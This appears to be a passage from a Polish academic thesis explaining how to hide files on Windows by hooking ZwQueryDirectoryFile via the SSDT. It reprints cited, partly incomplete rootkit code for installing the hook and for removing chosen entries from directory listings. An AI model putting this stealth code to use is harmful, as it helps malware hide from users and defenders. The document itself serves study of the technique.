Cały proces ukrywania plików przy pomocy punktów zaczepienia rozpoczynamy od zapoznania się ze schematem wywołania funkcji FindFirstFile, FindNextFile, ZwQueryDirectoryFile wykorzystywanych do wyszukiwania plików lub folderów o określonej przez użytkownika nazwie. Poniżej przedstawiono schematy wywołania wspomnianych funkcji.

\begin{figure}
	\centering
		\includegraphics[width=\textwidth]{img/small.png}
	\caption{Schemat wywołania FindFirstFile, FindNextFile, ZwQueryDirectoryFile}\cite{spopenko09}. 
\end{figure}
\FloatBarrier


Po zapoznaniu się z powyższym schematem możemy przejść do następnego kroku. Jest nim, próba odnalezienia numeru indeksu funkcji ZwQueryDirectoryFile. Wspomniany numer indeksu funkcji będzie wymagany do poprawnego stworzenia punktu zaczepienia w funkcji ZwQueryDirectoryFile.\\

Poszukiwania rozpoczynamy od przeanalizowania struktury tablicy deskryptorów usług systemowych SSDT(ang. System Sevice Descriptor Table). Poniżej przedstawiono strukturę tablicy SSDT w kodzie\cite{spopenko09}:
\begin{small}
\begin{verbatim}
typedef struct _SYSTEM_SERVICE_TABLE
{
    PNTPROC ServiceTable;
    PDWORD  CounterTable;
    ULONG   ServiceLimit;
    PBYTE   ArgumentTable;
}
SYSTEM_SERVICE_TABLE ,
    * PSYSTEM_SERVICE_TABLE ,
    * * PPSYSTEM_SERVICE_TABLE ;

typedef struct _SERVICE_DESCRIPTOR_TABLE {
    SYSTEM_SERVICE_TABLE ntoskrnl;  //SST for ntoskrnl.exe
    SYSTEM_SERVICE_TABLE win32k;    //SST for win32k.sys
    SYSTEM_SERVICE_TABLE unused1;
    SYSTEM_SERVICE_TABLE unused2;
}
SERVICE_DESCRIPTOR_TABLE ,
    * PSERVICE_DESCRIPTOR_TABLE,
    * * PPSERVICE_DESCRIPTOR_TABLE ;    
\end{verbatim}
\end{small}

Analizują strukturę SSDT szczególną uwagę warto zwrócić na trzy poniższe linie:

\begin{verbatim}
SYSTEM_SERVICE_TABLE ,
    * PSYSTEM_SERVICE_TABLE ,
    * * PPSYSTEM_SERVICE_TABLE ;	
\end{verbatim}

Powyższy zapis jednoznacznie wskazuje, że SystemServiceTable jest tablicą wskaźników do funkcji rozpoczynających się od przedrostka Zw. W tym momencie należy się zastanowić w jaki sposób można odnaleźć indeks funkcji \textit{ZwQueryDirectoryFile} w tablicy ServiceTable? \\

W tym celu należy znaleźć takie miejsce w systemie operacyjnym, w którym ten indeks jest zawsze wykorzystywany. Sposobem pozyskania takiej informacji jest wykorzystanie programu \textbf{WinDBG} w celu deasemblacji funkcji \textit{ZwQueryDirectoryFile}. 

\begin{figure}[h]
	\centering
		\includegraphics[scale=0.7]{img/windbg.png}
			\caption{Wynik deasemblacji funkcji ZwQueryDirectoryFile.} 
\end{figure}
\FloatBarrier

W wyniku podjętych działań uzyskaliśmy indeks funkcji \textit{ZwQueryDirectoryFile} w tablicy ServiceTable. Odczytana wartość wynosi \textbf{0DFh}. Deasemblacja pozostałych funkcji ZwXXX pozwala stwierdzić, że rozpoczynają się one od tej samej instrukcji przedstawionej poniżej:
\begin{verbatim}
mov eax, index_fukcji_w_tablicy_ServiceTable.
\end{verbatim} 

Poniżej przedstawiono przykładowy kod\cite{spopenko09}, który pozwoli wykorzystać zdobyte informacje w celu instalacji punktów zaczepienia w funkcji \textit{ZwQueryDirectoryFile}:
\begin{small}
\begin{verbatim}
SSTHook CreateSSTHook(IN const PVOID pNewFuncPtr,IN PUNICODE_STRING function_name)
{
    PVOID pTrueFuncPtr_ZW=MmGetSystemRoutineAddress(function_name);

    if(pTrueFuncPtr_ZW == NULL)
        throw std::exception(__FUNCTION__"Can't get function address");

    // Skip command byte, move to index byte
    ULONG mFuncID = *(PULONG)((PUCHAR) pTrueFuncPtr_ZW + 1);
}
\end{verbatim}
\end{small}

Po skutecznej instalacji punktu zaczepienia możemy przejść do podrozdziału związanego z modyfikacją wyników zwracanych przez pierwotne funkcje.

\subsubsection{Modyfikacja wyników zwracanych przez pierwotne funkcje.}

Skuteczne ukrycie wybranych plików wymaga modyfikacji informacji zwracanych przez funkcję \textit{ZwQueryDirectoryFile}. Poniżej przedstawiono kod źródłowy wspomnianej funkcji: 
\begin{small}
\begin{verbatim}
NTSTATUS ZwQueryDirectoryFile(
	HANDLE FileHandle,
	HANDLE Event,
	PIO_APC_ROUTINE ApcRoutine,
	PVOID ApcContext,
	PIO_STATUS_BLOCK IoStatusBlock,
	PVOID FileInformation,
	ULONG Length,
	FILE_INFORMATION_CLASS FileInformationClass,
	BOOLEAN ReturnSingleEntry,
	PUNICODE_STRING FileName,
	BOOLEAN RestartScan
);
\end{verbatim}
\end{small}
Szczególna uwagę należy zwrócić na FILE\_INFORMATION\_CLASS FileInformationClass, a dokładniej na zwracaną strukturę FileFullDirectoryInformation\footnote{\url{http://msdn.microsoft.com/en-us/library/windows/hardware/ff540289.aspx}}. Poniżej przedstawiono jej wygląd w kodzie wraz z opisem zwracanych przez nią informacji:
\begin{small}
\begin{verbatim}
typedef struct _FILE_FULL_DIR_INFORMATION {
  ULONG         NextEntryOffset;
  ULONG         FileIndex;
  LARGE_INTEGER CreationTime;
  LARGE_INTEGER LastAccessTime;
  LARGE_INTEGER LastWriteTime;
  LARGE_INTEGER ChangeTime;
  LARGE_INTEGER EndOfFile;
  LARGE_INTEGER AllocationSize;
  ULONG         FileAttributes;
  ULONG         FileNameLength;
  ULONG         EaSize;
  WCHAR         FileName[1];
} FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION;
\end{verbatim}
\end{small}

\begin{itemize}
  \item ULONG NextEntryOffset - przesunięcie bajtowe względem następnego wpisu FILE\_FULL\_DIR\_INFORMATION, jeśli w buforze jest więcej wpisów tego typu. W przypadku gdy istnieje tylko jeden wpis, zwracana jest wartość zero. 
  \item ULONG FileIndex - przesunięcie bajtowe pliku w katalogu nadrzędnym. Dla systemów plików takich jak NTFS, wartość ta nie zostaje określona ze względu na to, że pozycja pliku w katalogu nadrzędnym nie jest stałą, może być zmieniona w dowolnym czasie w celu utrzymania porządku.
  \item LARGE\_INTEGER CreationTime - data w której dany plik został utworzony.
  \item LARGE\_INTEGER LastAccessTime - data w której dany plik był ostatnio używany.
  \item LARGE\_INTEGER LastWriteTime - data kiedy nastąpił ostatni zapis do pliku.
  \item LARGE\_INTEGER ChangeTime - data kiedy nastąpiła ostatnia zmiana w pliku.
  \item LARGE\_INTEGER EndOfFile - przesunięcie bajtowe wskazujące bezpośrednio bajt po ostatnim ważnym bajcie danego pliku.
  \item LARGE\_INTEGER AllocationSize - zarezerwowawszy dla danego pliku rozmiar podawany w bajtach.
  \item ULONG FileAttributes - atrybuty pliku, mogą być kombinacją poniższych właściwości:
  	\begin{small}
  	\begin{itemize}
  		\item FILE\_ATTRIBUTE\_READONLY,
		\item FILE\_ATTRIBUTE\_HIDDEN,
		\item FILE\_ATTRIBUTE\_SYSTEM,
		\item FILE\_ATTRIBUTE\_DIRECTORY,
		\item FILE\_ATTRIBUTE\_ARCHIVE,
		\item FILE\_ATTRIBUTE\_NORMAL,
		\item FILE\_ATTRIBUTE\_TEMPORARY,
		\item FILE\_ATTRIBUTE\_COMPRESSED.
  	\end{itemize}
  	\end{small}
  \item ULONG FileNameLength - określa długość nazwy pliku.
  \item ULONG EaSize - łączna długość nazwy pliku wraz z rozszerzeniem podawana w bajtach.
  \item WCHAR FileName[1] - określa pierwszy znak w łańcuchu nazwy pliku.
\end{itemize}

Posiadając wiedzę na temat powyższych funkcji i struktur można przystąpić do stworzenia kodu umożliwiającego modyfikację informacji zwracanych przez opisane powyżej funkcje. Poniżej przedstawiono przykładowy kod\cite{spopenko09}:
\begin{small}
\begin{verbatim}
struct NtList
{
    size_t NextEntryOffset;
};
#define LastEntryOffset 0
inline bool IsEntryLast(NtList* pList)
{
    return (pList->NextEntryOffset == LastEntryOffset);
}
////////////////////////////////////// FOR EACH SECTION //////////////////////////
inline NtList*
GetNextEntryPointer(NtList* list)
{
    if(list->NextEntryOffset == 0)
        throw std::exception("No more entries inside list");

    return (NtList*)((char*)list + list->NextEntryOffset);
}
template<class Visitor>
inline void
ListForEach( NtList* list, Visitor visitor )
{
    while( true )
    {
        visitor(list);

        if( IsEntryLast(list) )
            break;

        list = GetNextEntryPointer(list);
    }
}
///////////////////////////////// ENTRY COUNT SECTION ///////////////////////////
inline void
CountEntryVisitor(NtList* list,size_t* entryCount)
{
    *entryCount += 1;
}
inline size_t
GetEntryCount(NtList* list)
{
    size_t count = 0;
    ListForEach(list,boost::bind(&CountEntryVisitor,_1,&count));
    return count;
}
////////////////////////////////// LIST SIZE SECTION ///////////////////////////
inline void
SizeEntryVisitor(NtList* list,size_t* size)
{
    size += list->NextEntryOffset;
}
inline size_t
GetListSize(NtList* list)
{
    size_t size = 0;
    ListForEach(list,boost::bind(&SizeEntryVisitor,_1,&size));
    return size;
}
///////////////////////////////// CUT SECTION //////////////////////////////////
inline void
CutNextEntryByFakeOffset( NtList* list )
{
    NtList* pNextEntry = GetNextEntryPointer(list);

    if( IsEntryLast(pNextEntry) )
        list->NextEntryOffset = LastEntryOffset;
    else
        list->NextEntryOffset = list->NextEntryOffset + 
    							pNextEntry->NextEntryOffset;
}
template<class Checker>
inline void
CutFromListByFakeOffset_IfImpl( NtList* list,
                                Checker checker )
{
    if( IsEntryLast(list) )
        return; // Last entry already dispatched

    while(true)
    {
        NtList* pNextEntry = GetNextEntryPointer(list);
        if( !checker(pNextEntry) )
            break;

        CutNextEntryByFakeOffset(list);
        if( IsEntryLast(list) )
            break;
    }
}
template<class Checker>
inline void
CutFromListByFakeOffset_If( NtList* list
                          , Checker checker )
{
    ListForEach( list, boost::bind(&CutFromListByFakeOffset_IfImpl<Checker>,_1,
                                   boost::ref(checker) ) );
}
\end{verbatim}
\end{small}
Posiadając już możliwość modyfikacji zwracanych przez funkcje wyników przechodzimy do podrozdziału opisującego ostatni etap ukrywania plików.

\subsubsection{Ukrycie wybranego pliku}

Jak zostało wspomniane we wcześniejszej części tej pracy proces ukrywania wybranego pliku powinno rozpocząć się od zmodyfikowania informacji zwracanych przez ZwQueryDirectoryFile.

W tym celu tworzymy nową funkcję NewZwQueryDirectoryFile, która będzie wywoływana zamiast oryginalnej funkcji. Zwracane przez nią wyniki będą przetwarzane przez algorytm ukrywający pliki. Poniżej przedstawiono przykładowy kod\cite{spopenko09}:
\newpage
\begin{small}
\begin{verbatim}
NTSTATUS NewZwQueryDirectoryFile(IN HANDLE FileHandle,
                                 IN HANDLE Event OPTIONAL,
                                 IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                                 IN PVOID ApcContext OPTIONAL,
                                 OUT PIO_STATUS_BLOCK IoStatusBlock,
                                 OUT PVOID FileInformation,
                                 IN ULONG FileInformationLength,
                                 IN FILE_INFORMATION_CLASS FileInformationClass,
                                 IN BOOLEAN ReturnSingleEntry,
                                 IN PUNICODE_STRING FileName OPTIONAL,
                                 IN BOOLEAN RestartScan)
{
    using namespace HideAlgorithm;

    NtQueryDirParams params = {FileHandle,Event,ApcRoutine,ApcContext,
        IoStatusBlock,FileInformation,FileInformationLength,
        FileInformationClass,ReturnSingleEntry,FileName,RestartScan};

    NTSTATUS status = OriginalHandlerWrapper(params);
    if( !NT_SUCCESS(status) )
        return status;

    params.RestartScan = FALSE; // Search must be continued
    // Save original handler to request more data in future
    HideParams hideParams = {params,gFileChecker,&OriginalHandlerWrapper};

    switch(FileInformationClass)
    {
    case FileDirectoryInformation:
        return HideFile<FILE_DIRECTORY_INFORMATION>(hideParams);
    case FileFullDirectoryInformation:
        return HideFile<FILE_FULL_DIRECTORY_INFORMATION>(hideParams);
    case FileBothDirectoryInformation:
        return HideFile<FILE_BOTH_DIRECTORY_INFORMATION>(hideParams);
    case FileNamesInformation:
        return HideFile<FILE_NAMES_INFORMATION>(hideParams);
    case FileIdBothDirectoryInformation: // Used by Vista and later explorer
        return HideFile<FILE_ID_BOTH_DIR_INFORMATION>(hideParams);
    case FileIdFullDirectoryInformation: // Used by Vista and later explorer
        return HideFile<FILE_ID_FULL_DIR_INFORMATION>(hideParams);
    default:return status;
    }
}
\end{verbatim}
\end{small}

Po wykonaniu się wspomnianej wyżej operacji, wiemy już jakie informacje miały zostać zwrócone do wywołującego naszą spreparowaną funkcję. Posiadając taką wiedzę możemy wykorzystać kod z poprzedniego podrozdziału do usunięcia zbędnych z naszego punktu widzenia informacji. 

Następnym krokiem jest ustanowienie komunikacji pomiędzy wywołującym oryginalną funkcję ,a stworzonym algorytmem ukrywającym. Poniżej przedstawiono przykładowy kod rozwiązujący powyższe zdanie\cite{spopenko09}:

\begin{small}
\begin{verbatim}
struct IFileChecker
{
    virtual bool
    CheckFile( wchar_t* fileName
             , size_t nameSize
             , const NtQueryDirParams& params )=0;
};
\end{verbatim}
\end{small}

Należy jednocześnie zadbać o odpowiednią obsługę możliwych błędów. W przypadku pojawienia się nieobsłużonego wyjątku, system operacyjny zawiesi się. Poniżej przedstawiono przekładowy kod\cite{spopenko09} zapobiegający takiej sytuacji:

\begin{small}
\begin{verbatim}
template<class InfoType>
inline NTSTATUS
HideFile( const HideParams& params )
{
    try
    {
        return HideFileImpl<InfoType>(params);
    }
    catch(const std::exception& ex)
    {
#ifdef KdPrint // For use in user mode environment
        KdPrint( (__FUNCTION__" std::exception: %s\n",ex.what()) );
#endif
    }
    return STATUS_SUCCESS;
}
\end{verbatim}
\end{small}

Ostatnim krokiem jaki należy wykonać jest ukrycie kolejnych wpisów zwracanych przez ZwQueryDirectoryFile. Warto zauważyć, że do ukrycia pierwszego i każdego kolejnego wpisu stosuje się inne podejście. W przypadku ukrywania pierwszego zwracanego wpisu musimy przesunąć bufor, w przypadku pozostałych wpisów wystarczające jest ustawienie fałszywego przesunięcia (ang. offset). Poniżej przedstawiono przykładowy kod realizujący opisane zadanie\cite{spopenko09}:

\begin{small}
\begin{verbatim}
template<class InfoType>
inline NTSTATUS
FirstEntryProcessor( const HideParams& params )
{
    utils::NtList* pList =
        (utils::NtList*)params.callParams.FileInformation;
    utils::NtList* pCurEntry = pList;

    while(true)
    {
        if(!CheckFileEntry<InfoType>(pCurEntry,params))
        {
            if(pList == pCurEntry)
                break; // Nothing to hide
            ShiftBuffer(pList,pCurEntry);
            break; // First entry hiding complete
        }

        // This entry needs to be hidden
        if( utils::IsEntryLast(pCurEntry) == false )
        { 	// Move to next entry to check.
            // This is needed to shift buffer only once.
            pCurEntry = utils::GetNextEntryPointer(pCurEntry);
        }
        else
        {	// Reached last entry
            // This mean that all data needs to be hidden
            
            // Try to request more data
            NTSTATUS status = params.wrapperPtr(params.callParams);
            if( !NT_SUCCESS(status) )
                return status;
            // Move to begin and resume checking
            pCurEntry = pList;
        }
    }
    return STATUS_SUCCESS;
}
template<class InfoType>
inline NTSTATUS
NextEntryProcessor( const HideParams& params )
{
    utils::NtList* pList =
        (utils::NtList*)params.callParams.FileInformation;

    if( utils::IsEntryLast(pList) )
        return STATUS_SUCCESS;

    utils::CutFromListByFakeOffset_If(pList,
        boost::bind(&CheckFileEntry<InfoType>,_1,params));

    return STATUS_SUCCESS;
}
\end{verbatim}
\end{small}


Informacje wraz z przykładowymi kodami źródłowymi przedstawione w powyższych punktach powinny umożliwić skuteczne ukrywanie plików z wykorzystaniem punktów zaczepienia.
\newpage